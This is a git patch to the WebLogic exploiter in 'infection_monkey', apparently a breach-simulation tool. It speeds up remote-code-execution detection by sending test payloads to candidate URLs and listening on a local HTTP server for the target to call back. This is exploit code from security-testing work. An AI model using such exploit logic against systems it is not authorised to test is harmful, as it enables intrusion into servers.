From 6073e9f677c2d27df62841d5804c249f33764063 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Jan 2019 17:28:44 +0200 Subject: [PATCH] Improved the speed of weblogic exploiter --- monkey/infection_monkey/exploit/weblogic.py | 36 ++++++++++++++++++--- 1 file changed, 31 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index ac78555af..98b20ad6c 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import threading import logging +import time __author__ = "VakarisZ" LOG = logging.getLogger(__name__) # How long server waits for get request in seconds SERVER_TIMEOUT = 4 -# How long to wait for a request to go to vuln machine and then to our server from there. In seconds +# How long should be wait after each request in seconds +REQUEST_DELAY = 0.0001 +# How long to wait for a sign(request from host) that server is vulnerable. In seconds REQUEST_TIMEOUT = 2 # How long to wait for response in exploitation. In seconds EXECUTION_TIMEOUT = 15 @@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE): print(e) return True - def check_if_exploitable(self, url): + def add_vulnerable_urls(self, urls): + """ + Overrides parent method to use listener server + """ # Server might get response faster than it starts listening to it, we need a lock httpd, lock = self._start_http_server() + exploitable = False + + for url in urls: + if self.check_if_exploitable(url, httpd): + exploitable = True + break + + if not exploitable and httpd.get_requests < 1: + # Wait for responses + time.sleep(REQUEST_TIMEOUT) + + if httpd.get_requests > 0: + # Add all urls because we don't know which one is vulnerable + self.vulnerable_urls.extend(urls) + self._exploit_info['vulnerable_urls'] = self.vulnerable_urls + else: + LOG.info("No vulnerable urls found, skipping.") + + self._stop_http_server(httpd, lock) + + def check_if_exploitable(self, url, httpd): payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) try: - post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) + post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False) except exceptions.ReadTimeout: - # Our request does not get response thus we get ReadTimeout error + # Our request will not get response thus we get ReadTimeout error pass except Exception as e: LOG.error("Something went wrong: %s" % e) - self._stop_http_server(httpd, lock) return httpd.get_requests > 0 def _start_http_server(self):